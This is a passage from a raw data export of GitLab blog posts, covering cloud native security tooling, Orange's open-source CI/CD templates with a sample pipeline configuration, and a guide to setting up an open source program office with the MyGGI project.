pushed into merge requests.\n\nKubernetes deployment images can be controlled through additional integrations with the [Open Policy Agent Gatekeeper](https://www.openpolicyagent.org/docs/latest/kubernetes-introduction/) or [Kyverno](https://kyverno.io/policies/best-practices/restrict_image_registries/restrict_image_registries/). Kyverno also allows you to [mutate the image registry location](https://kyverno.io/policies/other/replace_image_registry/replace_image_registry/), and redirect the pod image to trusted sources.\n\n[Operational container scanning](https://docs.gitlab.com/ee/user/clusters/agent/vulnerabilities.html) in Kubernetes clusters and [container scanning in CI/CD pipelines](https://docs.gitlab.com/ee/user/application_security/container_scanning/) are recommended. This ensures that all images do not expose security vulnerabilities.\n\n## Long-term solutions\n\nAs a long-term solution, analyze the affected Docker Hub organizations images and match them against your image usage inventory. Some organizations have raised their concerns in [this Docker Hub feedback issue](https://github.com/docker/hub-feedback/issues/2314). Be sure to identify critical production CI/CD workflows and replace all external dependencies with local maintained images.\n\nFork/copy project Dockerfile files from the upstream Git repositories, and use them as the single source of truth for custom container builds. This will also require training and documentation for DevSecOps teams, for example optimizing container images for [efficient CI/CD pipelines](https://docs.gitlab.com/ee/ci/pipelines/pipeline_efficiency.html). More DevSecOps efficiency tips can be found in my Chemnitz Linux Days talk about \"Efficient DevSecOps Pipelines in a Cloud Native World\" ([slides](https://go.gitlab.com/RPog2h)).\n\n\u003Ciframe src=\"https://docs.google.com/presentation/d/e/2PACX-1vT3jcfpddKL2jq7leX01QX6S4Y8vfLLBZMz4L1ZHMLY3xzB4IGOOIExODLEzH8YQM1atCNPm07Bw9m_/embed?start=false&loop=true&delayms=3000\" frameborder=\"0\" width=\"960\" height=\"569\" allowfullscreen=\"true\" mozallowfullscreen=\"true\" webkitallowfullscreen=\"true\">\u003C/iframe>\n\nPlease share your ideas and thoughts about Docker Hub change mitigations and tools on the [GitLab community forum](https://forum.gitlab.com/). Thank you!\n\nCover image by [Roger Hoyles](https://unsplash.com/photos/sTOQyRD8m74) on [Unsplash](https://www.unsplash.com)\n{: .note}\n",[1036,1038,9],{"slug":2955,"featured":6,"template":689},"how-gitlab-can-help-mitigate-deletion-open-source-images-docker-hub","content:en-us:blog:how-gitlab-can-help-mitigate-deletion-open-source-images-docker-hub.yml","How Gitlab Can Help Mitigate Deletion Open Source Images Docker Hub","en-us/blog/how-gitlab-can-help-mitigate-deletion-open-source-images-docker-hub.yml","en-us/blog/how-gitlab-can-help-mitigate-deletion-open-source-images-docker-hub",{"_path":2961,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2962,"content":2967,"config":2973,"_id":2975,"_type":14,"title":2976,"_source":16,"_file":2977,"_stem":2978,"_extension":19},"/en-us/blog/how-gitlab-can-help-you-secure-your-cloud-native-applications",{"title":2963,"description":2964,"ogTitle":2963,"ogDescription":2964,"noIndex":6,"ogImage":1007,"ogUrl":2965,"ogSiteName":673,"ogType":674,"canonicalUrls":2965,"schema":2966},"How GitLab improves cloud native application security and protection","In this article, we will show you how GitLab can help you streamline your cloud native application security from a code and operations point of view by providing you with real-world examples.","https://about.gitlab.com/blog/how-gitlab-can-help-you-secure-your-cloud-native-applications","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How GitLab improves cloud native application security and protection\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Nico Meisenzahl\"}],\n        \"datePublished\": \"2020-08-18\",\n      }",{"title":2963,"description":2964,"authors":2968,"heroImage":1007,"date":2970,"body":2971,"category":1119,"tags":2972},[2969],"Nico Meisenzahl","2020-08-18","\n{::options parse_block_html=\"true\" /}\n\nIn the [cloud-native](/topics/cloud-native/) ecosystem, decisions and changes are made on a rapid basis. Applications get adapted and deployed multiple times a week or even day. Microservices get developed decentralized with different peoples and teams involved. In such an environment, it is crucial to ensure that applications are developed and operated safely. This can be done by shifting security left into the developer lifecycle but also by using DevSecOps to empower operations with enhanced monitoring and protection for the application runtime.\n\nIn this article, I would like to show you how GitLab can help you streamline your application security from a code and operations point of view by providing you with real-world examples. Before we deep dive into the example, let me first introduce you to the [GitLab Secure](https://about.gitlab.com/stages-devops-lifecycle/secure/) and [GitLab Protect](https://about.gitlab.com/stages-devops-lifecycle/govern/) product portfolio which are the foundation for this. GitLab Secure helps developers to enable accurate, automated, and continuous assessment of their applications by proactively identifying vulnerabilities and weaknesses and therefore minimizing security risk. GitLab Protect, on the other hand, supports operations by proactively protecting environments and cloud-native applications by providing context-aware technologies to reduce overall security risk. Both are backed by leading open-source projects that have been fully integrated into developer and operation processes and the GitLab user interface (UI).\n\n## Cloud Native Application Security: The attack\n\nLet’s assume we have an application hosting a web interface that allows a user to provide some input. The application is written in [Golang](https://golang.org/) and executes the input as part of an external operating system command ([os/exec](https://golang.org/pkg/os/exec/)). The application does not contain any validation or security features to validate the input, which allows us to inject additional commands that are also executed in the application environment.\n\nThe application is running as containerized microservices in a Kubernetes cluster. The Kubernetes Cluster is shared across multiple teams and projects, allowing us to inject and read data in another application running next to ours. In our example, we will connect an unsecured Redis instance in a different Namespace and read/write data.\n\nNow let us take a closer look at how GitLab can help us detect the attack, permit its execution, and finally help us find and fix the root cause in our code.\n\n## Container Host Security\n\n[Container Host Security](/stages-devops-lifecycle/govern/) helps us to detect an attack in real-time by monitoring the pod for any unusual activity. It can then alert operations with detailed information on the attack itself.\n\nContainer Host Security is powered by [Falco](https://falco.org/), an open-source runtime security tool that listens to the Linux kernel using eBPF. Falco parses system calls and asserts the stream against a configurable rules engine in real-time. The Falco deployment used by Container Host Security can be deployed and fully managed using [GitLab Managed Apps](https://docs.gitlab.com/ee/update/removals.html).\n\nIn our example, Falco detects the injected redis-cli command, which is used to read/write data into the unsecured Redis instance. \n\n![Container Host Security](https://about.gitlab.com/images/blogimages/2020-08-18-How-GitLab-Can-Help-You-Secure-Your-Cloud-Native-Applications/falco.png)\n\nFalco can now alert operations who can use those valuable insights to define and execute further steps. \n\n## Container Network Security\n\nA first step to permit access to the unsecured Redis instance would be to permit traffic between the application in our Kubernetes cluster. This can be done by using [Container Network Security](/stages-devops-lifecycle/govern/). Container Network Security is again fully managed by [GitLab Managed Apps](https://docs.gitlab.com/ee/update/removals.html) and can also be configured within the GitLab project user interface.\n\nContainer Network Security is powered by [Cilium](https://cilium.io/), an open-source networking plugin for Kubernetes that can be used to implement support for NetworkPolicy resources. [Network Policies](https://kubernetes.io/docs/concepts/services-networking/network-policies/) can be used to detect and block unauthorized network traffic between pods and to/from the Internet.\n\nImplementing Network Policies for our application will block the underlying network traffic generated by the attack. The policies can be enabled within the GitLab project UI:\n\n![Network Policies](https://about.gitlab.com/images/blogimages/2020-08-18-How-GitLab-Can-Help-You-Secure-Your-Cloud-Native-Applications/network-polices.png)\n\n## Web Application Firewall\n\nWith Container Network Security in place, our attack isn’t able to talk to the Redis instance anymore, but it is still possible to execute other network unrelated attacks using the command injection. [Web Application Firewall (WAF)](/stages-devops-lifecycle/govern/) can now help us to increase the security and detect and block the attack at the [Kubernetes Ingress](https://kubernetes.io/docs/concepts/services-networking/ingress/) level. \n\nThe Web Application firewall is also powered by open-source. It is based on the [ModSecurity](https://kubernetes.github.io/ingress-nginx/user-guide/third-party-addons/modsecurity/) module, a toolkit for real-time web application monitoring, logging, and access control. It is preconfigured to use the [OWASP’s Core Rule Set](https://www.modsecurity.org/CRS/Documentation/), which provides generic attack detection capabilities. Like the other integrations, Web Application Firewall is also fully managed by GitLab using [GitLab Managed Apps](https://docs.gitlab.com/ee/update/removals.html).\n\nIn our example, the Web Application Firewall detects the attack and is also able to block it:\n\n![Web Application Firewall logs](https://about.gitlab.com/images/blogimages/2020-08-18-How-GitLab-Can-Help-You-Secure-Your-Cloud-Native-Applications/waf-log.png)\n\nBlocking the attack at the Ingress level will help us to deny the traffic before it hits our application. To do so, we can enable the Web Application Firewall blocking mode directly from the GitLab UI:\n\n![WAF settings](https://about.gitlab.com/images/blogimages/2020-08-18-How-GitLab-Can-Help-You-Secure-Your-Cloud-Native-Applications/waf-settings.png)\n\nIn addition to Container Host Security, we could have used the Web Application Firewall to detect the attack using the Thread Monitoring dashboard within our GitLab project:\n\n![Thread Monitoring](https://about.gitlab.com/images/blogimages/2020-08-18-How-GitLab-Can-Help-You-Secure-Your-Cloud-Native-Applications/thread-monitoring.png)\n\nThe Thread Monitoring dashboard also provides us with useful insights and metrics of our enforced Container Network Policy.\n\n## Static Application Security Testing\n\nWe have now successfully protected our application runtime and ensured that no additional attacks can be executed. But we should also find and fix the root cause to ensure that such incidents are not recurring in the future. This is where [Static Application Security Testing (SAST)](/stages-devops-lifecycle/secure/) can help us. Static Application Security Testing can be easily integrated into our project using [GitLab CI/CD](https://docs.gitlab.com/ee/ci/) and then allows us to analyze our [source code](/solutions/source-code-management/) for known vulnerabilities.\n\nIn our case (a Golang application) the code scanning is executed using the open-source project [Golang Security Checker](https://github.com/securego/gosec). The results are displayed in the Security dashboard of our GitLab project for easy access:\n\n![Security Dashboard](https://about.gitlab.com/images/blogimages/2020-08-18-How-GitLab-Can-Help-You-Secure-Your-Cloud-Native-Applications/sec-dashboard.png)\n\nIn our example, the code scan has identified the root cause and provides us with detailed information about the vulnerability, the line of code that needs to be fixed, and the ability to easily create an issue to fix it.\n\n![SAST](https://about.gitlab.com/images/blogimages/2020-08-18-How-GitLab-Can-Help-You-Secure-Your-Cloud-Native-Applications/sast.png)\n\nFinally, of course, we should also talk to the team running the other application to make sure that their Redis instance gets secured too. We should also verify how the other [GitLab Secure](https://about.gitlab.com/stages-devops-lifecycle/secure/) features can help to further improve the overall security of the application.\n\n## GitLab Protect and Secure in action\n\nIf you like to get more insights on GitLab Secure and Protect and want to see it in action, you are welcome to join [Wayne](https://gitlab.com/whaber), [Philippe](https://gitlab.com/plafoucriere) and myself in our session [“Your Attackers Won't Be Happy! How GitLab Can Help You Secure Your Cloud-Native Applications!”](https://gitlabcommitvirtual2020.sched.com/event/dUWw/your-attackers-wont-be-happy-how-gitlab-can-help-you-secure-your-cloud-native-applications) at GitLab Commit where you can gain further insights on Container Host Security, Container Network Security, Web Application Firewall (WAF), and Status Application Security Testing (SAST).\n\nRegister today and join me and others at [GitLab Commit](https://about.gitlab.com/events/commit/) on August 26. GitLab Commit 2020 is a free 24-hour virtual experience filled with practical DevOps strategies shared by leaders in development, operations, and security.\n",[845,685,1038,9,865],{"slug":2974,"featured":6,"template":689},"how-gitlab-can-help-you-secure-your-cloud-native-applications","content:en-us:blog:how-gitlab-can-help-you-secure-your-cloud-native-applications.yml","How Gitlab Can Help You Secure Your Cloud Native Applications","en-us/blog/how-gitlab-can-help-you-secure-your-cloud-native-applications.yml","en-us/blog/how-gitlab-can-help-you-secure-your-cloud-native-applications",{"_path":2980,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2981,"content":2987,"config":2993,"_id":2995,"_type":14,"title":2996,"_source":16,"_file":2997,"_stem":2998,"_extension":19},"/en-us/blog/how-orange-uses-gitlab-ci-cd-for-modern-devops",{"title":2982,"description":2983,"ogTitle":2982,"ogDescription":2983,"noIndex":6,"ogImage":2984,"ogUrl":2985,"ogSiteName":673,"ogType":674,"canonicalUrls":2985,"schema":2986},"How Orange made a first step toward CI/CD standardization with GitLab","Find out how Orange made a first step toward CI/CD standardization with GitLab","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682084/Blog/Hero%20Images/oranges.jpg","https://about.gitlab.com/blog/how-orange-uses-gitlab-ci-cd-for-modern-devops","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How Orange made a first step toward CI/CD standardization with GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Pierre Smeyers\"}],\n        \"datePublished\": \"2021-07-29\",\n      }",{"title":2982,"description":2983,"authors":2988,"heroImage":2984,"date":2990,"body":2991,"category":10,"tags":2992},[2989],"Pierre Smeyers","2021-07-29","\n\nCI/CD is a foundational piece to modern software development. It's a major brick in the [DevOps](/topics/devops/) \"Automation\" pillar and every company involved in IT has to implement CI/CD or they're already quite far behind the curve.\n\nBut [implementing CI/CD](/topics/ci-cd/) can be challenging especially for growing or large companies. Some of those challenges include:\n\n* DevOps expertise and technical skills\n* [DevSecOps](/topics/devsecops/)\n* Standardization\n\n## Three key hurdles that come with implementing CI/CD\n\nThis blog post unpackes these challenges and explains how [Orange](https://orange.com/) overcame them using GitLab.\n\n### DevOps and technical skills\n\nNo matter which CI/CD tool you're using, it requires some amount of expertise to implement it right.\n\n**DevOps expertise** is important because your team needs some experience with Git workflows, deployment, environments, secrets management, etc. You can't ask a complete rookie to implement a state-of-the art DevOps pipeline without expertise or experience.\n\n**Technical skills** are also important for implementing CI/CD. Any professional can tell you that getting started tutorials are insufficient. We inevitably need advanced functions, and that requires knowing the tool pretty well. This is particularly true with GitLab CI/CD, which is a fantastic functionally rich tool. GitLab CI/CD is constantly evolving, which creates an ongoing burden for projects that want to integrate new tooling as they go.\n\n### DevSecOps\n\nDevOps is all about finding the right balance between shortening the cycle and maximizing your confidence.\n\n[DevSecOps tools](/solutions/security-compliance/) are a keystone in maximizing our confidence because they detect issues with things like security, code quality, and compliance, etc., almost instantly. But DevSecOps tools are evolving quickly and today's Docker container scanner tools can be replaced by newcomers in just a few months.\n\nAlso, having each development team in the company choose and integrate various DevSecOps tools doesn't make sense and will be a waste of time and resources. Going this route means most developers won't use any DevSecOps tool because the opportunity cost isn't worth the time and effort.\n\n### Standardization\n\nThe last challenge in implementing CI/CD at a large company is the lack of standardization.\n\nGitLab CI/CD - as with most other CI/CD tools - is mainly a sophisticated scheduler, allowing a team to define technical tasks and their sequence. GitLab CI/CD cares little about the nature of these tasks, and does not give any clues as to the \"right\" way to build a DevOps pipeline. The consequence of this is that every company, project team, and developer will implement a DevOps pipeline their own way, in a manner that is probably significantly different from their colleagues'.\n\nAs a lifelong Javaist, I like to compare the current situation in CI/CD with what was the Java build in the pre-Maven era. Back then, we used non-structuring tools such as [Make](https://en.wikipedia.org/wiki/Make_(software)) or [Apache Ant](https://en.wikipedia.org/wiki/Apache_Ant). Each project created its own build system, adopted its own conventions, code, and resource files structure. In short, it was a happy mess with everyone reinventing the wheel. When joining another project, a user had to ask: \"How does the build work here?\".\n\nIn 2004, Maven was released (and Gradle three years later). For a while, there were heated debates between the proponents of standardization and the defenders of expertise and customization. Today it would not occur to anyone to build a Java project with anything other than Maven or Gradle. Now, if I join a project developed in Java, I will immediately know how files are organized and how the project is built. Java build is now standardized.\n\nI believe that CI/CD ought to go a similar route: tools should offer a more opinionated framework so that CI/CD too becomes a non-topic.\n\n## How a single GitLab feature changed the game for Orange\n\nAt Orange - probably like many other companies involved in IT - we struggled with the three challenges summarized above.\n\nThen in January 2019, the [`include`](https://docs.gitlab.com/ee/ci/yaml/#include) feature was released in the [Community Edition (version 11.7) of GitLab](/releases/2019/01/22/gitlab-11-7-released/):\n\n```yaml\ninclude:\n  - project: a-path/to-some-project'\n    file: '/very-smart-template.yml'\n```\n\nThis feature finally gave us the ability to develop and share state-of-the-art GitLab CI/CD pipeline templates!\n\nSo that's what we did.\n\nFor two years, a handful of DevOps/security/languages/cloud experts developed ready-to-use GitLab CI/CD pipeline templates. This personal initiative quickly became recognized as an internal project, attracting more users and contributors, bringing the community to 1000+ members as of June 2021, and leveraging about 30 available templates. The visible effect of this increasing adoption is the beginning of a **CI/CD standardization at Orange**.\n\nWe were so happy with our results and convinced that it's a general need that we open sourced our templates under the name [\"to be continuous\"](https://to-be-continuous.gitlab.io/doc/).\n\n![To be continuous logo](https://about.gitlab.com/images/blogimages/orange_tbc.jpg){: .shadow}\nThe \"to be continuous\" logo.\n{: .note.text-center}\n\n### What is in *to be continuous*?\n\nFor now, *to be continuous* has 26 templates of six kinds:\n\n* **Build & Test**: Angular, Bash, Go, Gradle, Maven, MkDocs, Node.js, PHP, Python\n* **Code Analysis**: Gitleaks, SonarQube\n* **Packaging**: Docker\n* **Infrastructure** (IaC): Terraform\n* **Deploy & Run**: Ansible, Cloud Foundry, Google Cloud, Helm, Kubernetes, OpenShift, S3 (Simple Storage Service)\n* **Acceptance**: Cypress, Postman, Puppeteer, Robot Framework, SSL test, k6\n* **Others**: semantic-release\n\n*To be continuous* is thoroughly documented:\n\n* [Basic notions and philosophy](https://to-be-continuous.gitlab.io/doc/understand/)\n* [General usage principles](https://to-be-continuous.gitlab.io/doc/usage/)\n* How to use *to be continuous* in a [self-managed instance of GitLab](https://to-be-continuous.gitlab.io/doc/self-managed/basic/)\n* Every template also has [its own documentation](https://to-be-continuous.gitlab.io/doc/ref/angular/)\n\nTo get started quickly, *to be continuous* provides an [interactive configurer](https://to-be-continuous.gitlab.io/kicker/) (aka *\"kicker\"*) that allows generating the `.gitlab-ci.yml` file simply by selecting the technical characteristics of your project.\n\nFinally, *to be continuous* exposes several [example projects](https://gitlab.com/to-be-continuous/samples), illustrating how to use the templates in production-like projects, combining multiple templates.\n\n### A quick glance at *to be continuous*\n\nThere are tons of resources to get started with *to be continuous*. But here is a quick example to get the taste of it.\n\nHere is the `.gitlab-ci.yml` file for a project:\n\n* Developed in Java 11 (built with Maven)\n* Code analysis with SonarQube\n* Packaged as a Docker image\n* Deployed to Kubernetes cluster\n* GUI tests with Cypress\n* API tests with Postman (Newman)\n\n```yaml\ninclude:\n  # Maven template\n  - project: \"to-be-continuous/maven\"\n    ref: \"1.4.2\"\n    file: \"templates/gitlab-ci-maven.yml\"\n  # Docker template\n  - project: \"to-be-continuous/docker\"\n    ref: \"1.2.0\"\n    file: \"templates/gitlab-ci-docker.yml\"\n  # Kubernetes template\n  - project: \"to-be-continuous/kubernetes\"\n    ref: \"1.2.0\"\n    file: \"templates/gitlab-ci-k8s.yml\"\n  # Cypress template\n  - project: \"to-be-continuous/cypress\"\n    ref: \"1.2.0\"\n    file: \"templates/gitlab-ci-cypress.yml\"\n  # Postman template\n  - project: \"to-be-continuous/postman\"\n    ref: \"1.2.0\"\n    file: \"templates/gitlab-ci-postman.yml\"\n\n# Global variables\nvariables:\n  # Explicitly define the Maven + JDK version\n  MAVEN_IMAGE: \"maven:3.8-openjdk-11\"\n\n  # Enables SonarQube analysis (on sonarcloud.io)\n  SONAR_URL: \"https://sonarcloud.io\"\n  # organization & projectKey defined in pom.xml\n  # SONAR_AUTH_TOKEN defined as a secret CI/CD variable\n\n  # Kubernetes\n  K8S_KUBECTL_IMAGE: \"bitnami/kubectl:1.17\" # client version matching my cluster\n  K8S_URL: \"https://k8s-api.my.domain\" # Kubernetes Cluster API url\n  # K8S_CA_CERT & K8S_TOKEN defined as secret CI/CD variables\n  # enable review, staging & prod\n  K8S_REVIEW_SPACE: \"non-prod\"\n  K8S_STAGING_SPACE: \"non-prod\"\n  K8S_PROD_SPACE: \"prod\"\n\n  # Cypress & Postman: enable test on review aps\n  REVIEW_ENABLED: \"true\"\n\n# Pipeline steps\nstages:\n  - build\n  - test\n  - package-build\n  - package-test\n  - review\n  - staging\n  - deploy\n  - acceptance\n  - publish\n  - production\n  ```\n\nThis fully declarative file produces the following **development pipeline** (any feature branch):\n\n![Screenshot of development pipeline](https://about.gitlab.com/images/blogimages/orange_development_pipeline.jpg){: .shadow}\n\n... and the following **production pipeline** (`master` or `main` depending on your preferences):\n\n![Screenshot of production pipeline](https://about.gitlab.com/images/blogimages/orange_production_pipeline.jpg){: .shadow}\n\nAlthough they look pretty much the same, they aren't:\n\n* While the production pipeline privileges sureness and completeness, development pipelines privilege short cycles and developer experience. While code analysis jobs and acceptance tests are blocked in production, they only generate a non-blocking warning in development in case of failure.\n* The production pipeline deploys to the staging environment before deploying to production (provided acceptance tests are green). Development pipelines may deploy to a dynamically generated review environment (optional).\n* Developers may prefer to use a single integration environment (associated with the develop branch) instead of one review app per feature branch. The default behavior of the integration pipeline is much closer to the production one.\n\nWhat you can't see:\n\n* Java unit tests are automatically executed, their report is [integrated to GitLab](https://docs.gitlab.com/ee/ci/unit_test_reports.html), with [code coverage](https://docs.gitlab.com/ee/ci/yaml/#coverage) too.\n* SonarQube integration automatically uses [branch analysis](https://docs.sonarqube.org/latest/branches/overview/) or [MR analysis](https://docs.sonarqube.org/latest/analysis/pull-request/) (with MR decoration) depending on the context.\n* Kubernetes environments are obviously [integrated to GitLab](https://docs.gitlab.com/ee/ci/environments/) too.\n* [Review apps](https://docs.gitlab.com/ee/ci/review_apps/index.html) can be cleaned-up manually or automatically on branch deletion.\n* Cypress and Postman tests reports are also [integrated to GitLab](https://docs.gitlab.com/ee/ci/unit_test_reports.html).\n* Docker uses the Kaniko build by default but it might be configured to use Docker-in-Docker instead. It uses the GitLab registry by default but can be configured to use any other registry.\n* Each template integrates the most appropriate DevSecOps tools: [kube-score](https://kube-score.com/) for Kubernetes, [hadolint](https://github.com/hadolint/hadolint) for Docker, [OWASP Dependency-Check](https://jeremylong.github.io/DependencyCheck/) for Maven, among others.\n* All those templates combine themselves gracefully. For example, Kubernetes may simply deploy the Docker image built upstream; Cypress and Postman tests automatically test the application deployed in the upstream jobs; Kubernetes could be replaced with OpenShift, GCP or any other supported hosting technology, it would behave the same.\n\n## Contribute to *to be continuous*\n\n[to be continuous](https://to-be-continuous.gitlab.io/doc) is out and eagerly waiting for users and contributors.\n\nHave a look and share your feedback. Whether you like our choices or not, we want to hear from you. Your inputs are even more valuable to help us improve *to be continuous* and cover as many use cases as possible.\n\nBut anyway, never forget this: [`include`](https://docs.gitlab.com/ee/ci/yaml/#include) is undoubtedly the feature that makes CI/CD standardization possible in your company (and beyond).\n\nCover image by [Graphic Node](https://unsplash.com/@graphicnode) on [Unsplash](https://unsplash.com/photos/yi1YB_FubH8)\n{: .note}\n",[685,9,1036],{"slug":2994,"featured":6,"template":689},"how-orange-uses-gitlab-ci-cd-for-modern-devops","content:en-us:blog:how-orange-uses-gitlab-ci-cd-for-modern-devops.yml","How Orange Uses Gitlab Ci Cd For Modern Devops","en-us/blog/how-orange-uses-gitlab-ci-cd-for-modern-devops.yml","en-us/blog/how-orange-uses-gitlab-ci-cd-for-modern-devops",{"_path":3000,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3001,"content":3007,"config":3013,"_id":3015,"_type":14,"title":3016,"_source":16,"_file":3017,"_stem":3018,"_extension":19},"/en-us/blog/how-start-ospo-ten-minutes-using-gitlab",{"title":3002,"description":3003,"ogTitle":3002,"ogDescription":3003,"noIndex":6,"ogImage":3004,"ogUrl":3005,"ogSiteName":673,"ogType":674,"canonicalUrls":3005,"schema":3006},"Start an open source center of excellence in 10 minutes using GitLab","Launch your own open source program office using the OSPO Alliance's tools on GitLab","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682593/Blog/Hero%20Images/opensign.jpg","https://about.gitlab.com/blog/how-start-ospo-ten-minutes-using-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Start an open source center of excellence in 10 minutes using GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Boris Baldassari\"}],\n        \"datePublished\": \"2023-01-30\",\n      }",{"title":3002,"description":3003,"authors":3008,"heroImage":3004,"date":3010,"body":3011,"category":801,"tags":3012},[3009],"Boris Baldassari","2023-01-30","\nNow that open source has finally become a mainstream topic of conversation in the software industry, many organizations are increasingly curious about best practices for consuming, using, managing, and contributing to open source software projects. Open source software can seem alien and intimidating for organizations unfamiliar with it, and participating meaningfully and effectively in the open source ecosystem can be challenging.\n\nOrganizations especially serious about working in open source have formed [open source program offices](https://opensource.com/business/16/5/whats-open-source-program-office) (OSPOs) to spearhead their efforts. These offices are centers of excellence for an organization's ongoing work in open source. They help the organization realize the benefits of working with open source communities to accelerate innovation and build more secure tools.\n\nPerhaps your organization is considering establishing an OSPO. If it is, you likely have questions about how to get started – and especially about the best ways to help your organization become a valuable participant in the open source ecosystem.\n\nThe [OSPO Alliance](https://ospo.zone/) can help. Formed in 2021, the OSPO Alliance connects [experienced open source practitioners](https://ospo.zone/membership/) with organizations in need of seasoned guides to the open source world. Since the organization's founding, its members have composed a corpus of best open source practices called the [Good Governance Initiative Handbook](https://ospo.zone/ggi/), which explores various legal, cultural, and strategic considerations organizations face when working with open source software (and, naturally, the handbook itself is openly licensed, so anyone can contribute to it).\n\nTo celebrate the launch of the GGI Handbook Version 1.1, the OSPO Alliance went a step further: We have released the [MyGGI project](https://gitlab.ow2.org/ggi/my-ggi-board), which allows organizations to quickly create the infrastructure for their own open source program offices using GitLab.\n\nNow, let's look at what the MyGGI project can help your organization accomplish, including how to use the tool to establish an OSPO built on GGI principles — in only 10 minutes.\n\n## Working with the GGI Handbook\n\nThe GGI Handbook defines 25 activities, or best practices, organized according to various goals an organization may seek to accomplish with open source. Examples of activities include recommendations like \"Manage open source skills and resources,\" \"Manage software dependencies,\" \"Upstream first,\" or \"Engage with open source projects.\" Each of these activities, then, has a corresponding description and rationale, and the handbook provides resources, tools, and hints for successfully implementing them.\n\nActivites are intentionally generic and must be adapted to your organization's specific, unique, local context. The GGI Hanbook offers tools for doing this, too: scorecards. Scorecards allow you to assess your organization's engagement in and progress with various open source best practices.\n\nSo working with the GGI Handbook in your organization might look something like this:\n\n1. Evaluate the open source-related activities the handbook proposes and remove those that don't fit your specific context (maybe some activities will require a bit of adptation to be more relevant to the domain, while some others may just be discarded).\n1. Identify the activities that would be most beneficial to reaching your organization's goals in engaging with open source.\n1. Construct an Agile-like, iterative process for working on a small set of these activities. Do this in the form of sprints by tracking your progress with scorecards, and adapt the activity to your local context, team cultures, and available resources as you go.\n1. At the end of each iteration, review the activities your teams have completed, select a new scope for improvement, and repeat the process.\n\nThe MyGGI project provides a push-button infrastructure for doing this work. Next, let's examine how to deploy it on GitLab.\n\n### Deploying the GGI Handbook on GitLab\n\nThe OSPO Alliance wanted to provide a quick and straightforward way for organizations to establish their own open source program activities using a dashboard, so they can start implementing the GGI Handbook's methods without delay. We didn't want to reinvent the wheel with some heavy custom tooling. Instead, we decided to build the project using tools already available to us. We had already used GitLab issues to model activities during the early stages of handbook development, so reusing this GitLab feature made most sense. By simply adding some scripting to automate the initialization of activities and updating a static website on GitLab Pages, we were able to launch the project so others could easily deploy it in their own GitLab instances.\n\nInstructions for deploying the program are available in the project's [README](https://gitlab.ow2.org/ggi/my-ggi-board/-/blob/main/README.md). Let's review them here and start your own OSPO together.\n\nFirst, we need to create a new project on our GitLab instance. Select `Import project`, then `From repository by URL`. \n\nNext, we will need to provide a remote URL. Copy the existing MyGGI project by using the [URL](https://gitlab.com/gitlab-com/marketing/community-relations/open-source-program/gitlab-open-source-partners/publications-and-presentations/-/tree/main) `[https://gitlab.ow2.org/ggi/my-ggi-board.git](https://gitlab.ow2.org/ggi/my-ggi-board.git)`.\n\nThen we will give our project a unique name and choose a visibility level. Here's an example of how it might look:\n\n![Repository by URL](https://about.gitlab.com/images/blogimages/ospointenminutes/screenshot-1.png){: .shadow}\n\nWhen you have configured your desired settings, click `Create project` to continue.\n\nOur next step is to configure access privileges. Go to `Project Settings > Access Tokens` and create a `Project Access Token` with `API` privilege and `Maintainer` role. The project's scripts will use these to create the issues and generate the static website dashboard for your OSPO.\n\nWhen the token is created, copy it to a safe place, as **you will never be able to see it again**. Note that some GitLab instances prefer to disable the Project Access Token feature in favor of Personal Access Tokens. This is perfectly okay; the preference won't affect the deployment of this project (see the instructions for more details).\n\nHere's an example of what you will see at this stage:\n\n![Project access tokens](https://about.gitlab.com/images/blogimages/ospointenminutes/screenshot-2.png){: .shadow}\n\nWe will then provide this access token to the pipelines and scripts by creating a CI/CD environment variable. Go to `Project Settings` and then `CI/CD`. Scroll to the `Variables` section and add a new variable with name `GGI_GITLAB_TOKEN`. Input the access token you created in the last step as the value. Here's an example:\n\n![Add variable screen](https://about.gitlab.com/images/blogimages/ospointenminutes/screenshot-3.png){: .shadow}\n\nWe can now execute the pipeline to begin the process of creating your OSPO infrastructure. Go to `CI/CD`, then `Pipelines`, and click on `Run pipeline`. After a couple of minutes, the pipeline should finish and the website will deploy. You will see something like this when the pipeline finishes:\n\n![Pipeline passed screen](https://about.gitlab.com/images/blogimages/ospointenminutes/screenshot-4.png){: .shadow}\n\nInfrastructure for your open source program office is now ready!\n\n### Using the tools\n\nThe MyGGI project creates a set of 25 activities, along with a nice project board to help you visualize them:\n\n![Project board](https://about.gitlab.com/images/blogimages/ospointenminutes/screenshot-5.png){: .shadow}\n\nUsers can click on specific activities (rendered as issues) to read the description of the activity, understand the tools and resources that might help them complete it, and begin completing relevant scorecards. Users can also define their own perspectives on the activities, as they see them from the organization's specific context. Then they can create tasks to narrow the scope of each activity so they can iterate on it and track progress. \n\nTheir work is displayed on a static website hosted on GitLab Pages and updated nightly according to the organization's progress on various activities and tasks. This web page is especially useful to present the program and its day-to-day evolution to the organization (or the world); participants, stakeholders, and executives can review it to learn more about the various initiatives, see what work is underway, and track the overall development of the organization's open source program office. The initial website looks like this:\n\n![Welcome screen of website](https://about.gitlab.com/images/blogimages/ospointenminutes/screenshot-6.png){: .shadow}\n\n### Running your OSPO\n\nSelecting an open source program manager to oversee the work on the project boards is beneficial at this step. That person will:\n\n- Assign issues to team members to start working on new activities, create scorecards to track the work and associated tasks, and label them as \"In Progress\" instead of \"Not Started\".\n- Oversee the evolution of the work as it moves through various iterations, completing the scorecards with local resources and information, and closing issues as tasks are complete.\n- Ensure that issues keep making progress and, as team members complete them, assign new ones.\n\nAs changes occur in both the project and its issues, your OSPO's static website will regularly update to reflect the current status of activities, tasks, and the overall progress. After some time, for instance, the dashboard may look like this:\n\n![Dashboard with current status](https://about.gitlab.com/images/blogimages/ospointenminutes/screenshot-9.png){: .shadow}\n\nYou're now on your way to establishing your organization's open source program office. Don't hesitate to connect with the [OSPO Alliance](https://ospo.zone/) for help and support as you continue your journey!\n\n_Boris Baldassari is an open 